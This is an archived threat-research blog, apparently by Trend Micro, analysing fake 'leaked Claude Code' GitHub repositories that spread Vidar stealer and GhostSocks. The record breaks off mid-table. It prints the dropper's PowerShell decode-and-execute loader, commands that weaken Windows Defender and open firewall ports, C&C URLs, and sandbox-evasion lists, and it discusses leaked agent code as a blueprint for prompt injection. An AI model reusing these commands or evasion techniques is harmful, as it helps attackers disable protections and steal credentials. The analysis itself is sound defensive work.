{
	"id": "cfdd0859-3dee-426a-87fc-fc2f9b8eb287",
	"created_at": "2026-05-06T02:02:17.955186Z",
	"updated_at": "2026-05-06T02:03:52.759028Z",
	"deleted_at": null,
	"sha1_hash": "7c2d866aac3a558ae228733c723c48da8260718c",
	"title": "Weaponizing Trust Signals: Claude Code Lures and GitHub Release Payloads",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 758096,
	"plain_text": "Weaponizing Trust Signals: Claude Code Lures and GitHub\r\nRelease Payloads\r\nPublished: 2026-04-03 · Archived: 2026-05-06 02:01:49 UTC\r\nKey takeaways\r\nAnthropic inadvertently exposed internal Claude Code source material via a misconfigured npm package,\r\nwhich included approximately 512,000 lines of internal TypeScript and triggering rapid mirroring across\r\nGitHub.\r\nWithin 24 hours, threat actors took advantage of the attention around the leak, to distribute Vidar stealer\r\nand GhostSocks proxy malware through fake “leaked Claude Code” GitHub repositories.\r\nThe Claude Code bait is part of a broader rotating lure operation active since February 2026, impersonating\r\nmore than 25 software brands while delivering the same Rust-compiled infostealer payload.\r\nThe campaign abuses GitHub Releases as a trusted malware delivery channel, using large trojanized\r\narchives and disposable accounts to repeatedly evade takedowns.\r\nBeyond serving as a lure, the leaked source code itself introduces longer-term risks including vulnerability\r\ndiscovery, prompt injection blueprinting, and agentic attack surface exposure.\r\nOrganizations should only approve designated installation paths for AI developer tools and should actively\r\ndetect and block malicious indicators.\r\nOrganizations should also consider applying governance as a control plane for agentic risk. This incident\r\nsignifies that security compromise doesn't always come from software vulnerabilities: it can also come\r\nfrom human and organizational gaps. That's why TrendAI™ is introducing Agentic Governance Gateway\r\nto empower organizations to discover, observe, understand, detect, and enforce governance over agentic AI\r\nbehaviors to ensure safe and reliable adoption of autonomous AI.\r\nTrendAI Vision One™ detects and blocks the indicators of compromise (IOCs) outlined in this blog, and\r\nprovides customers with tailored threat hunting queries, threat insights, and intelligence reports. Customers\r\ncan also leverage Observed Attack Techniques (OAT) to hunt for suspicious activity associated with this\r\nthreat, and are protected by advanced pattern, behavior-monitoring, and signature-based detections.\r\nIn late March 2026open on a new tab, Anthropic inadvertently released the internal Claude Code source material\r\nas part of an npm package that included a large internal source map file. Although the incident stemmed from a\r\nsimple packaging mistake, threat actors were quick to capitalize on the resulting attention. Only 24 hours after the\r\nleak, they were able to create fake GitHub repositories to distribute credential-stealing malware disguised as\r\n“leaked” Claude Code downloads.\r\nThis incident demonstrates that security compromise is not limited to software vulnerabilities: human factors and\r\norganizational control gaps often serve as catalyst for threats and are primary drivers of material impact. In this\r\nblog entry, we will talk about our analysis of the threats capitalizing on this incident, the downstream risks of the\r\nleaked source code, and the actions organizations should take next.\r\nhttps://www.trendmicro.com/en_us/research/26/d/weaponizing-trust-claude-code-lures-and-github-release-payloads.html\r\nPage 1 of 21\n\nThe Claude Code source leak\r\nOn March 31, 2026, a routine npm publish for Anthropic's @anthropic-ai/claude-code package (version 2.1.88)\r\ninadvertently included a file that should never have shipped: cli.js.map, a 59.8 MB JavaScript source map\r\ngenerated by the Bun bundler. This file’s embedded sourcesContent field exposed the complete original\r\nTypeScript source tree— approximately 512,000 lines of code across 1,900 files—corresponding to build artifacts\r\nhosted on a publicly accessible Cloudflare R2 storage bucket.\r\nThe exposure was not a sophisticated breach, but a packaging error. The project's .npmignore file failed to\r\nexclude .map files from the distribution. Because Bun generates full source maps by default, without an explicit\r\nexclusion rule, the entire agentic harness powering Claude Code was also shipped out and laid bare to anyone who\r\nran npm install.\r\nWithin hours, the leaked source was mirrored across thousands of GitHub repositories. Anthropic confirmed the\r\nincident stemmed from human error, pulled the affected package version, and issued DMCA takedown notices\r\nagainst the mirrors. The company assured that no customer data or credentials were exposed.\r\nThis marked the second major Anthropic source-exposure incident in two months, following the “Mythosopen on\r\na new tab” leak, which also happened late-March and revealed internal details about an unreleased powerful AI\r\nmodel intended for cybersecurity use cases.\r\nAttack timeline\r\nBefore this leak, threat actors have been running AI-themed malware lures since at least February 2026, cycling\r\nthrough fake tools and repositories to attract developer interest. The Claude Code source leak on March 31\r\nprovided a convenient lure, a high-profile and timely lure. This enabled operators to rapidly repurpose their\r\nalready existing infrastructure. By April 1, within 24 hours of the leak, they pivoted to impersonating “leaked”\r\nClaude Code downloads, using the incident’s visibility to accelerate distribution of their infostealer payloads. \r\nDate Incident Description Key details\r\nFebruary 2026 AI tool lures\r\nMalware campaign using fake AI\r\ntools\r\nTradeAI.exe\r\n18+ unique samples\r\nCopilot, Cursor, AI tools\r\nActive campaign\r\nMarch 31, 2026\r\nSource code\r\nleak\r\nAccidental exposure of source code\r\nAnthropic npm packaging\r\nerror\r\n59.8 MB source map\r\nexposed\r\n512K lines TypeScript\r\nMarch 31 to April\r\n1, 2026\r\nTime window\r\nDelay between leak and\r\nweaponization\r\nWithin 24 hours of the leak\r\nhttps://www.trendmicro.com/en_us/research/26/d/weaponizing-trust-claude-code-lures-and-github-release-payloads.html\r\nPage 2 of 21\n\nApril 1, 2026\r\nClaude Code\r\nlure\r\nMalware distribution under fake\r\nClaude tooling\r\nClaudeCode_x64.7z\r\nClaudeCode_x64.exe\r\nVidar v18.7 + GhostSocks\r\nGitHub Releases delivery\r\nTable 1. The campaign timeline\r\nWhat the source code revealed\r\nThe leaked codebase exposedopen on a new tab several unreleased features and internal mechanisms:\r\nKAIROS: A persistent, always-running autonomous daemon mode enabling Claude Code to operate as a\r\nbackground agent that proactively acts on things it notices, with a 15-second blocking budget per cycle.\r\nUndercover Mode:A module (undercover.ts) that prevents the AI from accidentally revealing internal\r\ninformation, such as internal model codenames and Anthropic internals, when staff contribute to public\r\nrepositories.\r\nDream System: A background memory-consolidation erngine (autoDream) that runs a reflective pass over\r\nproject-specific memory files during idle periods via a forked subagent, reorganizing and optimizing stored\r\ncontext.\r\nAnti-Distillation: Protective mechanisms (ANTI_DISTILLATION_CC) that inject fake tool definitions and\r\napply cryptographic signatures to prevent competitors from training on API traffic.\r\nModel codenames: References to upcoming models, including Capybara (a new model with a 1M context\r\nwindow), Fennec (Opus 4.6), and Tengu (the project's internal codename). The source also references Opus\r\n4.7 and Sonnet 4.8.\r\nBuddy Pet: A hidden Tamagotchi-style pet system with a deterministic gacha mechanic spanning 18\r\nspecies, five RPG-like stats (i.e., debugging, patience, chaos, wisdom, and snark) and 1% shiny variants\r\nthat respond to user coding activity.\r\nClaude Code: One lure in a larger campaign\r\nThreat actors did not need the source code itself. They needed the hype.\r\nWithin 24 hours of the leak making headlines, malicious GitHub repositories began appearingopen on a new tab in\r\nsearch results—and near the top of Google results—for queries like “leaked Claude Code source” and “Claude\r\nCode download.” These repositories relied on familiar social engineering tactics, including READMEs promising\r\n“leaked source code” and “unlocked enterprise features,” fake download buttons embedded as images, and GitHub\r\nReleases hosting trojanized 7z archives.\r\nThe Claude Code bait, however, was only the latest chapter in a much broader operation.  Similar GitHub‑hosted\r\nlure campaigns earlier this year abused fake AI tooling repositories to distribute Vidar‑class infostealers and\r\nGhostSocks proxy malware, as previously documentedopen on a new tab by Huntress. Our observation reveals\r\nthat it’s likely that the  same threat actors have been running a rotating-lure campaign since dating back to\r\nFebruary 2026, cycling through more than 25 distinct software brands to attract victims. Regardless of the name\r\nhttps://www.trendmicro.com/en_us/research/26/d/weaponizing-trust-claude-code-lures-and-github-release-payloads.html\r\nPage 3 of 21\n\non the label or the branding, every archive delivers the same thing: a Rust-compiled dropper, TradeAI.exe, which\r\ndeploys Vidar stealer alongside the GhostSocks proxy malware.\r\nA rotating carousel of lures\r\nThe operation's scale becomes apparent when examining the parent archives that contain the TradeAI.exe payload.\r\nAcross 22 unique payload variants, we identified 38 distinct 7z archives—each branded as a different piece of\r\npopular software.\r\nThe lure themes fall into several categories that reveal the operators' targeting strategy:\r\nAI and LLM tools make up the largest cluster, capitalizing on the surge of interest in generative AI. The\r\ncampaign impersonates well-known names like Claude Code itself (packaged\r\nas ClaudeCode_x64.7z and claude-cowork-win-x64.7z), references to specific model versions (opus-4-6-\r\nx64.7z), and GitHub Copilot (CopilotCowork_x64.7z). It also mimics lesser-known or fictional AI brands,\r\nnamely KawaiiGPT_x64.7z, WormGPT_x64.7z, NemoClaw_x64.7z (styled as an NVIDIA\r\nproduct), SimpleClaw_x64.7z, clawdbot_x64.7z, nanobot_x64.7z, and OpenClaw_x64.7z. The naming is\r\ndeliberate to entice victims, wherein some sound like legitimate open-source projects, while others like\r\n“WormGPT” exploit curiosity around underground AI tools.\r\nCryptocurrency and trading tools form the second major theme. Archives named hyperliquid-bot_x64.7z and bbg_free_x64.7z (mimicking Bloomberg Terminal) target the finance and crypto\r\ncommunity, which is a demographic with high-value credentials and wallet data that makes them attractive\r\ntarget for infostealer campaigns.\r\nCreative and media tools round out the lure portfolio. The operators impersonate voice modification\r\nsoftware (voicemod_x64.7z), AI video generation tools (seedance_x64.7z, LTX-2.3_x64.7z, SoraRemover_x64.7z), and image generation tools (Z_image_x64.7z). These lures target\r\ncontent creators and artists who may be less security-conscious about software sourced from GitHub.\r\nUtility software provides additional coverage, with lures masquerading asYouTube_Downloader_x64.7z,\r\nOrcaSlicer_x64.7z (a 3D printing slicer), iRemovalPro_x64.7z (an iPhone unlocking tool), and\r\nperplexity_computer_x64.7z (impersonating the Perplexity AI search assistant). Each targets a different\r\nuser demographic, broadening the campaign's reach.\r\nOne pattern is consistent across all lures: a throwaway GitHub account creates a repository with a plausible name,\r\npopulates it with a minimal README, and hosts a trojanized 7z archive as a GitHub Release asset. The archives\r\nrange from 78 to 167 MBlarge enough to appear legitimate and to evade some automated scanning systems. Once\r\na repository is flagged and removed, the operators simply create a new account and repeat the process with a\r\ndifferent lure name.\r\nConfirmed distribution repositories\r\nUpon scanning for GitHub lures, our scanner identified 104 repositories created within seven days of the Claude\r\nCode leak using related keywords. Of these, two were confirmed to distribute malicious payloads via GitHub\r\nReleases:\r\nhttps://www.trendmicro.com/en_us/research/26/d/weaponizing-trust-claude-code-lures-and-github-release-payloads.html\r\nPage 4 of 21\n\nleaked-claude-code/leaked-claude-code: distributes ClaudeCode_x64.7z \r\nmy3jie/leaked-claude-code: repository-based delivery\r\nRelated network data confirmed six additional GitHub distribution URLs used by the broader campaign before the\r\nClaude Code pivot:\r\ngithub[.]com/Kawaii-GPT-ai/KawaiiGPT/releases/: KawaiiGPT lure\r\ngithub[.]com/ai-wormGPT/wormGPT/releases/: WormGPT lure\r\ngithub[.]com/claude-ai-opus-4-6/claude-opus-4.6/releases/: Claude Opus 4.6 lure\r\ngithub[.]com/realtime-voice-changer-app/realtime-voice-changer/releases/: Voicemod lure\r\ngithub[.]com/LTX-desktop/LTX-2.3/releases/: LTX video editor lure\r\ngithub[.]com/nvidia-nemoclaw/NemoClaw/releases/: NVIDIA NemoClaw lure\r\nKnown threat actor accounts include idbzoomh (taken down by GitHub), idbzoomh1, and my3jie. The accounts\r\nare disposable, as operators demonstrate no attachment to any single identity or lure theme.\r\nInfection chain\r\nThe infection chain is consistent across all lure variants:\r\n1. Discovery: The victim searches for a trending software tool on Google or GitHub. For the Claude Code\r\nvariant, queries like \"leaked Claude Code source\" and \"Claude Code download\" surface the malicious\r\nrepositories.\r\n2. Lure: The victim lands on a convincing GitHub repository with a README promising free access, leaked\r\nfeatures, or cracked versions.\r\n3. Download: The victim downloads a 7z archive (78–167 MB) from GitHub Releases. The archive name\r\nmatches the lure theme.\r\n4. Extraction: Inside the archive is TradeAI.exe, a Rust-compiled dropper binary. In the Claude Code variants,\r\nthe executable is renamed to ClaudeCode_x64.exe or similar.\r\n5. Execution: The dropper deploys two payloads:\r\nVidar Stealer (v18.7): An information stealer performing multi-threaded data theft of browser credentials,\r\ncryptocurrency wallets, session tokens, and system information.\r\nGhostSocks: A SOCKS5 proxy tool that tunnels network traffic through the victim's machine, enabling the\r\noperators to use compromised hosts as residential proxies.\r\n6. C\u0026C resolution: Vidar uses dead drop resolvers, which are  a Steam Community profile and a Telegram\r\nchannel,to retrieve the active C\u0026C address, making infrastructure takedowns more difficult.\r\n7. Exfiltration: Stolen data is packaged and sent to the Vidar C\u0026C server.\r\nTechnical analysis of the dropper payload\r\nWith the delivery method established, we focused on the malware itself. Static analysis of the Rust-compiled\r\ndropper distributed across the campaign's lure archives shows that, regardless of branding, the payload remains\r\nfundamentally the same. Although it appears under multiple filenames, such as ClaudeCode_x64.exe,\r\nTradeAI.exe, and other brand-name variants, the underlying binary is functionally identical across samples. It is a\r\nhttps://www.trendmicro.com/en_us/research/26/d/weaponizing-trust-claude-code-lures-and-github-release-payloads.html\r\nPage 5 of 21\n\npurpose-built loader that masquerades as a graphics driver updater and relies on XOR-encrypted strings with a 12-\r\nbyte rotating key to conceal C\u0026C URLs, staging paths, and exfiltration endpoints.\r\nBefore executing any payload logic, the dropper implements anti-analysis checks. It, enumerates the local\r\nenvironment against hardcoded sandbox usernames, hostnames, processes, and bot farm patterns, terminating\r\nsilently if an analysis environment is detected. This evasion strategy, combined with Rust compilation, which\r\nproduces binaries inherently harder to reverse-engineer, contributes to the campaign's persistently low detection\r\nrates across vendors.\r\nString encryption\r\nAll sensitive strings in the binary are encrypted using a simple XOR cipher with a 12-byte rotating key. At\r\nruntime, the malware attempts to load the decryption key from the environment variable cryptify_keyd3d ; if the\r\nvariable is not set, it falls back to the hardcoded default xnasff3wcedj.\r\nThe use of an environment variable (cryptify_keyd3d) for the XOR key suggests some flexibility, as it enables the\r\nmalware author to deploy variants with different keys or allow operators to customize decryption without\r\nrecompiling.\r\nIt uses the following decryption routine:\r\nChecks environment variable cryptify_keyd3d for custom key\r\nDefaults to hardcoded xnasff3wcedj (12 bytes)\r\nXOR each byte of the ciphertext with the key byte at index % 12\r\nReturns the resulting UTF-8 string\r\nListed here are the decrypted C\u0026C URLs:\r\nPrimary driver list URL: hxxps[://]pastebin[.]com/raw/mcwWi1Ue\r\nBackup driver list URL: hxxps[://]snippet[.]host/efguhk/raw\r\nEntry point and anti-analysis\r\nThe malware's entry point immediately establishes stealth by hiding the console window through a sequence of\r\nAPI calls: GetConsoleWindow(), ShowWindow(SW_HIDE), and FreeConsole(). This prevents users from\r\nnoticing the command window that would otherwise appear during execution.\r\nFollowing initialization, command-line arguments are parsed to determine the execution path. The malware\r\nsupports multiple modes including \"gui-only\" for displaying just the fake installer, \"no-gui-at\" for background-only operation, and \"runas-elevated\" for administrative execution.\r\nThe malware supports several command-line arguments to control execution behavior:\r\nArgument Purpose\r\nhttps://www.trendmicro.com/en_us/research/26/d/weaponizing-trust-claude-code-lures-and-github-release-payloads.html\r\nPage 6 of 21\n\n--gui-only Display GUI interface only (driver updater facade)\r\n--no-gui Run downloader without GUI (silent background mode)\r\n--elevated Post-UAC execution path (called after privilege escalation)\r\n--attempt=driver-update Retry counter for elevation attempts\r\nTable 2. Accepted command-line arguments\r\nAnti-analysis checks\r\nBefore executing its payload, the dropper evaluates its environment for signs of sandboxing, virtualization, or\r\nanalysis. If these are detected detected, it terminates silently to avoid exposure.\r\nVirtual machine detection\r\nThe anti-analysis function implements multi-layered VM detection checking registry keys, processes, drivers,\r\nhardware identifiers, and network configuration:\r\nTechnique Method Indicators checked\r\nRegistry Keys\r\nRegOpenKeyExW /\r\nRegQueryValueExW\r\nVMware Tools, VirtualBox Guest Additions\r\npaths\r\nProcess\r\nEnumeration\r\nCreateToolhelp32Snapshot\r\nvmtoolsd.exe, vmwaretray.exe,\r\nvboxservice.exe, vboxtray.exe\r\nDriver Files File existence checks\r\nVBoxGuest.sys, vmhgfs.sys, vmmouse.sys,\r\nVBoxMouse.sys\r\nMAC Prefixes Network adapter enumeration\r\n08:00:27 (VirtualBox), 00:15:5D (Hyper-V),\r\n52:54:00 (QEMU)\r\nhttps://www.trendmicro.com/en_us/research/26/d/weaponizing-trust-claude-code-lures-and-github-release-payloads.html\r\nPage 7 of 21\n\nGPU Adapters Display adapter name\r\nvmware svga, \"virtualbox graphics\", \"hyper-v\r\nvideo\"\r\nBIOS Strings System firmware checks\r\nseabios, \"bochs\", \"qemu\", \"hyper-v\",\r\n\"vmware\", \"vbox\"\r\nNetwork IP IP address check 10.0.2.15 (VirtualBox default NAT)\r\nTable 3. Artifacts checked for VM detection\r\nIt also checks the following virtual machine related artifacts:\r\nVM BIOS/Motherboard Strings:\r\nseabios\r\nbochs\r\nqemu\r\nvrtual\r\nhyper-v\r\nvmware\r\ngoogle\r\nvbox\r\ninnotek\r\nvirtual\r\nVM Driver Files:\r\nvmmouse.sys\r\nvmhgfs.sys\r\nVBoxMouse.sys\r\nVBoxGuest.sys\r\nVBoxSF.sys\r\nVBoxVideo.sys\r\nMAC Prefix Associated VM\r\n8:00:27 VirtualBox\r\n00:15:5D Hyper-V\r\nhttps://www.trendmicro.com/en_us/research/26/d/weaponizing-trust-claude-code-lures-and-github-release-payloads.html\r\nPage 8 of 21\n\n52:54:00 QEMU/KVM\r\n00:23:45 VirtualBox (alternate)\r\nTable 4. VM MAC Prefixes\r\nSandbox evasion\r\nBeyond VM detection, the malware implements extensive sandbox-specific evasion using comprehensive\r\nblacklists targeting known analysis environments, research usernames, and sandbox hostname patterns:\r\nBlacklisted usernames:\r\nmalware\r\nvirus\r\nsandbox\r\nsand box\r\nwdagutilityaccount\r\nbruno\r\nsample,\r\nmaltest\r\ncurrentuser\r\njz\r\ndekker\r\nJanet Van Dyne\r\nHarry Johnson\r\ntim\r\nJohn\r\nBlacklisted Hostnames:\r\nWasp\r\nDESK-IVRUUH4Y14\r\nMARS\r\nAMAZING-AVOCADO\r\nBIOS serials:\r\nSerial Associated environment\r\nete9t8e8t3 Windows Defender Application Guard (WDAG)\r\nhttps://www.trendmicro.com/en_us/research/26/d/weaponizing-trust-claude-code-lures-and-github-release-payloads.html\r\nPage 9 of 21\n\nH6MBDR4 Trellix / FireEye sandboxes\r\n0311-3550-2146-3025-5233-5781-38 Analysis environment\r\n0 Default/missing BIOS serial\r\n1234567890 Common VM placeholder\r\nTable 5. Serial numbers checked for VM detection\r\nDatacenter CPU:\r\nXeon\r\nEPYC\r\nMotherboard Manufacturer Blacklist:\r\nVirtualBox\r\nGoogle Compute Engine\r\nVirtual Machine\r\nSandbox DLLs:\r\ncuckoomon.dll\r\nSbieDll.dll\r\nSxIn.dll\r\ncmdvrt32.dll\r\ncmdvrt64.dll\r\nSandbox Hostname Patterns:\r\nOeslmdig\r\nBkismujm\r\nCgpslqmr\r\nDhrtnpns\r\nEkuuoqot\r\nFlvvprpu\r\nGmwwqsqv\r\nHnxxrtrw\r\nIoyysssx\r\nJpzzttty\r\nhttps://www.trendmicro.com/en_us/research/26/d/weaponizing-trust-claude-code-lures-and-github-release-payloads.html\r\nPage 10 of 21\n\nKqaauuuz\r\nLrbbvvva\r\nMsccwwwb\r\nNtddxxxc\r\nOueeyyyd\r\nPvffzzze\r\nRegex matching the pattern ^zds_fedr_ol_client_\\d+$\r\nDebugger and analysis tool detection\r\nIn addition to environment checks, the malware enumerates running processes to identify debuggers and analysis\r\ntools\r\nBlacklisted processes:\r\nollydbg.exe\r\nx32dbg.exe\r\nx64dbg.exe\r\nwindbg.exe\r\nida.exe\r\nida64.exe,\r\nprocesshacker.exe\r\nprocexp.exe\r\nprocexp64.exe\r\nwireshark.exe\r\nfiddler.exe,\r\ncharles.exe\r\nsandboxie.exe\r\nvmtoolsd.exe\r\nvmwaretray.exe\r\nvmwareuser.exe,\r\nvboxservice.exe\r\nvboxtray.exe\r\nPayload storage and extraction\r\nThe malware contains an embedded PowerShell payload that is XOR-encoded within the binary. The encoded data\r\nresides in the .data section and is decoded at runtime before execution. Additionally, the malware can download\r\npayloads from its C\u0026C infrastructure.\r\nThe embedded payload uses a two-layer encoding scheme. First, the data is XOR-encoded with key 44. The result\r\nis then Base64-encoded for storage. At runtime, the malware reverses this process:\r\nhttps://www.trendmicro.com/en_us/research/26/d/weaponizing-trust-claude-code-lures-and-github-release-payloads.html\r\nPage 11 of 21\n\n# Embedded XOR-encoded PowerShell payload\r\n$uowuunxT = 'CFwdDBEMC28WcHlfSV5fCyYIXB4MEQwOCElCWhZ4aWF8...'\r\n$uMoRdtBr = [System.Convert]::FromBase64String($uowuunxT)\r\n$wsCDOjzN = 44  # XOR key\r\n$swGGrVXi = [byte[]]@()\r\nforeach ($b in $uMoRdtBr) {\r\n    $swGGrVXi += $b -bxor $wsCDOjzN\r\n}\r\n$GCdKMnvk = [System.Text.Encoding]::UTF8.GetString($swGGrVXi)\r\n\u0026 ([ScriptBlock]::Create($GCdKMnvk))\r\nAfter XOR decryption with key 44 (0x2C), the payload reveals significant Windows Defender evasion and\r\nfirewall manipulation capabilities. The decrypted script systematically disables security controls to enable follow-on payloads to execute without interference.\r\nThe payload adds exclusions for common malware drop locations as well as prevents the scanning of PowerShell\r\nprocesses:\r\n# Path exclusions added by the decrypted payload\r\n$paths = @(\r\n    'C:\\Users',           # User profile directories\r\n    \"$env:TEMP\",          # Temporary files directory\r\n    'C:\\ProgramData',     # Application data\r\n    'C:\\OneDriveTemp',    # OneDrive temporary storage\r\n    'C:\\Users\\Public',    # Public user folder\r\n    'C:\\Windows'          # Windows system directory\r\n)\r\nforeach ($item in $paths) {\r\n    Add-MpPreference -ExclusionPath '$item'\r\n}\r\n# Process exclusions - prevents scanning of PowerShell\r\nAdd-MpPreference -ExclusionProcess 'powershell.exe'\r\nAdd-MpPreference -ExclusionProcess 'pwsh.exe'\r\nThe payload systematically disables multiple Defender protection features:\r\nFeature Command Impact\r\nMAPS Reporting -MAPSReporting 0 Disables cloud-based telemetry to Microsoft\r\nBlock at First Seen -DisableBlockAtFirstSeen $true Disables cloud-based threat blocking\r\nhttps://www.trendmicro.com/en_us/research/26/d/weaponizing-trust-claude-code-lures-and-github-release-payloads.html\r\nPage 12 of 21\n\nSample Submission -SubmitSamplesConsent NeverSend Prevents automatic sample uploads\r\nCloud Block Level -CloudBlockLevel 0 Disables cloud protection level\r\nPUA Protection -PUAProtection disable Disables potentially unwanted app detection\r\nIOAV Protection -DisableIOAVProtection $true Disables scanning of downloaded files\r\nBehavior Monitoring -DisableBehaviorMonitoring $true Disables real-time behavior analysis\r\nTable 6. Windows Defender security features disabled by the payload\r\nThe payload also opens inbound TCP ports for C\u0026C communication:\r\n# Firewall rules created by the decrypted payload\r\n$ports = @(57001, 57002, 56001)\r\nforeach ($port in $ports) {\r\n    New-NetFirewallRule -DisplayName \"Port $port TCP\" `\r\n        -Direction Inbound `\r\n        -LocalPort $port `\r\n        -Protocol TCP `\r\n        -Action Allow `\r\n        -Enabled True\r\n}\r\nGPU hardware scoring system\r\nThe binary implements a sophisticated GPU scoring mechanism to prioritize targets. Each detected GPU type\r\nreceives a \"bonus\" score where lower absolute values indicate higher priority as a download target. This scoring\r\nsystem reveals the malware specifically targets gaming PCs: likely for cryptocurrency mining, game credential\r\ntheft, or leveraging gaming GPU resources.\r\nGPU category Detection strings Score\r\nVirtual GPU\r\nvirtualbox, parallels, vmware svga, virtualbox graphics, hyper-v\r\nvideo, microsoft basic display adapter\r\nREJECTED\r\n(sandbox)\r\nhttps://www.trendmicro.com/en_us/research/26/d/weaponizing-trust-claude-code-lures-and-github-release-payloads.html\r\nPage 13 of 21\n\nIntegrated\r\nGraphics\r\nintel(r) uhd graphics, intel(r) iris, intel(r) hd graphics, amd\r\nradeon(tm) graphics\r\n-60\r\nProfessional Card quadro, radeon pro, rtx a -80\r\nAMD Gaming\r\nCard\r\nradeon rx 5, radeon rx 6, radeon rx 7 -90\r\nModern AMD\r\nGaming\r\nModern Radeon models -120\r\nGaming Card\r\n(NVIDIA)\r\ngeforce rtx 2, geforce rtx 3, geforce rtx 4, geforce gtx 10,\r\ngeforce gtx 16\r\nHighest priority\r\nBasic Display\r\n(local)\r\nFallback local display Low priority\r\nBasic Display\r\n(RDP)\r\nRemote desktop context Deprioritized\r\nTable 7. GPU scoring mechanism\r\nNetwork communication\r\nThe malware implements resilient C\u0026C communication using the Rust request library with Tokio async runtime.\r\nIf the primary server is unreachable, it automatically switches to a backup URL. Each URL receives three\r\nconnection attempts with two-second delays between retries.\r\nThe downloader randomly selects from five  hardcoded User-Agent strings to evade network-based detection:\r\nMozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko)\r\nChrome/140.0.0.0 Safari/537.36\r\nMozilla/5.0 (Windows NT 10.0; Win64; x64; rv:143.0) Gecko/20100101 Firefox/143.0\r\nMozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko)\r\nChrome/137.0.0.0 Safari/537.36\r\nMozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko)\r\nChrome/140.0.0.0 Safari/537.36 Edg/140.0.0.0\r\nhttps://www.trendmicro.com/en_us/research/26/d/weaponizing-trust-claude-code-lures-and-github-release-payloads.html\r\nPage 14 of 21\n\nMozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko)\r\nChrome/141.0.0.0 Safari/537.36\r\nOnce C\u0026C communication is established, the binary collects and reports system information to the C\u0026C before\r\npayload delivery:\r\nField Collection method\r\nUsername Environment variable harvesting\r\nPublic IP HTTP request to external IP service (encrypted URL at 0x140832BB0)\r\nTimestamp System time\r\nApp\r\nVersion\r\nHardcoded 1.3.12\r\nGPU Model Registry enumeration of display adapters\r\nCPU Info\r\nRegistry key HARDWARE\\DESCRIPTION\\System\\CentralProcessor\\0, value\r\nProcessorNameString\r\nCore Count System processor information query\r\nDrive Info Starting from C:\\\r\nTable 8. System information sent to the C\u0026C server\r\nThe malware follows the following download and installation chain:\r\n1. Fetch driver list: HTTP GET to primary URL (pastebin[.]com/raw/mcwWi1Ue), falls back to backup\r\n(snippet[.]host/efguhk/raw)\r\n2. Parse URLs: Extracts driver download URLs from fetched content\r\n3. Download archive: Attempts download with up to 3 retries per URL (primary then backup), 2-second delay\r\nbetween retries\r\n4. Fetch password: Requests archive extraction password from C\u0026C server; falls back to hardcoded default if\r\nserver returns empty or fails\r\nhttps://www.trendmicro.com/en_us/research/26/d/weaponizing-trust-claude-code-lures-and-github-release-payloads.html\r\nPage 15 of 21\n\n5. Extract payload: Unpacks the password-protected archive containing the \"driver\" payload\r\n6. Execute payload: Runs extracted content, likely a secondary malware stage or cryptominer\r\nSecurity implications of the leaked source code\r\nWhile the immediate threat is the social engineering campaign delivering Vidar, the leaked source code itself\r\npresents a distinct and longer-lasting risk surface. Security experts have warned that access to approximately\r\n512,000 lines of production code from a frontier AI company opens several attack vectors that extend well beyond\r\nusing the leak as a lure.\r\nVulnerability research and exploitation\r\nWith full access to the codebase, both security researchers and threat actors can systematically audit the code for\r\nexploitable vulnerabilities. This concern materialized almost immediately. Within days of the leak, a critical\r\nvulnerabilityopen on a new tab in Claude Code was publicly reported , demonstrating that the code is being\r\nactively analyzed.\r\nThe agentic nature of Claude Code makes this particularly concerning. Unlike a traditional application, Claude\r\nCode interacts with file systems, executes terminal commands, reads and writes files, and manages development\r\nenvironments. A vulnerability in the agentic harness could allow:\r\nArbitrary code execution through crafted inputs or project files\r\nData exfiltration from developer environments via manipulated tool calls\r\nPrivilege escalation through the tool permission system\r\nPrompt injection blueprint\r\nThe leaked source also reveals exactly how Claude Code constructs its system prompts, parses user instructions,\r\nhandles tool definitions, and enforces safety boundaries. This is effectively a blueprint for crafting targeted prompt\r\ninjections, with attackers knowing the precise wording, ordering, and structure of the safety instructions that\r\ngovern the model's behavior.\r\nThis knowledge could be used to bypass safety controls by understanding their exact implementation, craft inputs\r\nthat exploit parsing edge cases, and design adversarial inputs optimized for the specific prompt architecture.\r\nAnti-distillation and competitive intelligence\r\nThe ANTI_DISTILLATION_CC mechanisms revealed in the source code demonstrate Anthropic's approach to\r\npreventing competitors from training on Claude's API outputs. With the implementation details now public,\r\nadversaries have a roadmap for circumventing these protections. The cryptographic signatures and fake tool\r\ndefinitions used as canary traps are now visible and can be stripped or avoided.\r\nAgentic attack surface\r\nhttps://www.trendmicro.com/en_us/research/26/d/weaponizing-trust-claude-code-lures-and-github-release-payloads.html\r\nPage 16 of 21\n\nPerhaps the most significant long-term concern is the exposure of the complete “agentic harness,” which is the\r\nsystem that enables Claude Code to interact with real computing environments. The source code reveals how the\r\nmodel decides which tools to invoke and in what sequence, the permission model governing file system access,\r\ncommand execution, and network operations, the sandbox boundaries and how they are enforced, and the internal\r\nsafety classifiers and their decision logic.\r\nAccess to this knowledge gives adversaries a significant advantage in designing attacks against organizations\r\nwhose developers use Claude Code in their workflows.\r\nMITRE ATT\u0026CK TTPs\r\nTactic Technique ID Description\r\nResource\r\nDevelopment\r\nStage Capabilities: Upload Malware T1608.001\r\nMalware hosted on GitHub\r\nReleases\r\nResource\r\nDevelopment\r\nEstablish Accounts: Social Media\r\nAccounts\r\nT1585.003\r\nDisposable GitHub accounts for\r\ndistribution\r\nInitial Access Phishing: Spearphishing Link T1566.002\r\nLure repositories with\r\ndownload links\r\nExecution User Execution: Malicious File T1204.002\r\nVictim executes trojanized\r\ndropper\r\nDefense Evasion Obfuscated Files or Information T1027 Rust-compiled dropper binary\r\nDefense Evasion\r\nVirtualization/Sandbox Evasion:\r\nSystem Checks\r\nT1497.001\r\nDebug environment and user\r\ninput checks\r\nCredential Access Credentials from Password Stores T1555 Vidar steals browser credentials\r\nCollection Data from Local System T1005\r\nCryptocurrency wallets and\r\nsession tokens\r\nhttps://www.trendmicro.com/en_us/research/26/d/weaponizing-trust-claude-code-lures-and-github-release-payloads.html\r\nPage 17 of 21\n\nCommand and\r\nControl\r\nWeb Service: Dead Drop Resolver T1102.001\r\nSteam/Telegram profiles for C2\r\nresolution\r\nCommand 